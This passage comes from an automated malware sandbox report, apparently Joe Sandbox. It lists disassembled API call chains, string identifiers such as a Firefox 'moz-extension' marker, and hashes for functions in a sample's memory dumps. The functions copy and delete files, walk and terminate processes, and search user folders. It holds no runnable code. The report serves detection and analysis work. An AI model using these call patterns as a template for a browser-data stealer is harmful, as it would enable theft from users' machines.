                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcatlstrcpy
                        • String ID: vI@$vI@
                        • API String ID: 3905823039-1245421781
                        • Opcode ID: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                        • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                        • Opcode Fuzzy Hash: 944da6e453fcb66f0d11250dd24ec57f51aa285ffba2b214b4798455d692dd31
                        • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                        • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                        • wsprintfW.USER32 ref: 00418D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocProcesswsprintf
                        • String ID: %hs
                        • API String ID: 659108358-2783943728
                        • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                        • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                        • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                        • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024A8A30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                        • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                        • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                        • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                        • String ID:
                        • API String ID: 257331557-0
                        • Opcode ID: de670670cf904c9c927a51a929ed92d79dee4ce31803c7dcd1d260c6cdf7ea42
                        • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                        • Opcode Fuzzy Hash: de670670cf904c9c927a51a929ed92d79dee4ce31803c7dcd1d260c6cdf7ea42
                        • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 040AA548
                        • lstrlen.KERNEL32(00000000,00000000), ref: 040AA666
                        • lstrlen.KERNEL32(00000000), ref: 040AA923
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 040AA094
                        • DeleteFileA.KERNEL32(00000000), ref: 040AA9AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                        • String ID:
                        • API String ID: 257331557-0
                        • Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                        • Instruction ID: ced6144387468d3576a1f3fb0eef8d894c8ab0e2acb6a4bce540f566bf4af59e
                        • Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
                        • Instruction Fuzzy Hash: A1E12272A10108ABDB19FBA4DD90DEEB339AF5430CF548159E196B2091EF347B48CFA5
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024A8A30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                        • lstrlenA.KERNEL32(00000000), ref: 0040D698
                        • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 58ef4cafaffe2497abfaa00a1ba11a8901acf803780b8d31dff15c3066b05c83
                        • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                        • Opcode Fuzzy Hash: 58ef4cafaffe2497abfaa00a1ba11a8901acf803780b8d31dff15c3066b05c83
                        • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 040AD6E8
                        • lstrlen.KERNEL32(00000000), ref: 040AD8FF
                        • lstrlen.KERNEL32(00000000), ref: 040AD913
                        • DeleteFileA.KERNEL32(00000000), ref: 040AD992
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                        • Instruction ID: 1e53f0777a4d81ab7fb935df2fb82bf691f4f5dc3d4c6a50487fd72ec3a2d225
                        • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                        • Instruction Fuzzy Hash: 13911F72A10208ABDB18FBA4DD90DEE7339AF5420CF54416DE196B2090EF747B48CFA5
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024A8A30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                        • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                        • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 45a8e2ffbbbbce1f6d79d82263585e2ee75481ad9d2b77eb8bb546676890c79b
                        • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                        • Opcode Fuzzy Hash: 45a8e2ffbbbbce1f6d79d82263585e2ee75481ad9d2b77eb8bb546676890c79b
                        • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 040ADA68
                        • lstrlen.KERNEL32(00000000), ref: 040ADC06
                        • lstrlen.KERNEL32(00000000), ref: 040ADC1A
                        • DeleteFileA.KERNEL32(00000000), ref: 040ADC99
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                        • Instruction ID: 652f27b9af69d57b2953b578b4b7e30d1bc5ae09e274c891c0f8d834af19c3ad
                        • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                        • Instruction Fuzzy Hash: C9811C72A10208ABDB08FBE4DD94DEE7339AF5420CF544569E196B2090EF747A48CFA5
                        APIs
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                        • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: 764425abfb5a9061e9931e0f88fc4c66e20ec6cd90a7d0511f203d9c21200adc
                        • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                        • Opcode Fuzzy Hash: 764425abfb5a9061e9931e0f88fc4c66e20ec6cd90a7d0511f203d9c21200adc
                        • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                        APIs
                        • memset.MSVCRT ref: 004194EB
                          • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                          • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                          • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                        • CloseHandle.KERNEL32(00000000), ref: 004195D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                        • String ID:
                        • API String ID: 396451647-0
                        • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                        • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                        • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                        • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                        APIs
                        • memset.MSVCRT ref: 040B9752
                          • Part of subcall function 040B8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,040B9785,00000000), ref: 040B8FC2
                          • Part of subcall function 040B8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 040B8FC9
                          • Part of subcall function 040B8FB7: wsprintfW.USER32 ref: 040B8FDF
                        • OpenProcess.KERNEL32(00001001,00000000,?), ref: 040B9812
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 040B9830
                        • CloseHandle.KERNEL32(00000000), ref: 040B983D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                        • String ID:
                        • API String ID: 3729781310-0
                        • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                        • Instruction ID: 8c69cdb4e7a3d35ada54ae9290d8a15c84230011e2a2f8133784f90953928f40
                        • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                        • Instruction Fuzzy Hash: 23314AB5E40248EFEB14DFD0CC48BEDB7B9EF44304F104458E646AA284DB786A84CF96
                        APIs
                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                        • Process32First.KERNEL32(?,00000128), ref: 004186DE
                        • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                        • CloseHandle.KERNEL32(?), ref: 00418761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 295465e2c392afe472870706c1eb777868b99a61b0a103c81585df39d90fc3af
                        • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                        • Opcode Fuzzy Hash: 295465e2c392afe472870706c1eb777868b99a61b0a103c81585df39d90fc3af
                        • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                        APIs
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 040B8931
                        • Process32First.KERNEL32(?,00000128), ref: 040B8945
                        • Process32Next.KERNEL32(?,00000128), ref: 040B895A
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        • CloseHandle.KERNEL32(?), ref: 040B89C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                        • Instruction ID: 90cb1cf10861e6568165f7aca3c02e4702d3b06efd5e4f85da6b913c67736eb9
                        • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                        • Instruction Fuzzy Hash: 36313E72A41218ABDB24EF94DD44FEEB778EB45708F104199E149B21A0DB347A44CFE5
                        APIs
                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                        • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                        • lstrcatA.KERNEL32(?,024D9BB0), ref: 00414FAB
                        • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: b0342ffc00c1ba5c51a09cb54271c449f0d754700971868c6145d4cda71998d2
                        • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                        • Opcode Fuzzy Hash: b0342ffc00c1ba5c51a09cb54271c449f0d754700971868c6145d4cda71998d2
                        • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                        APIs
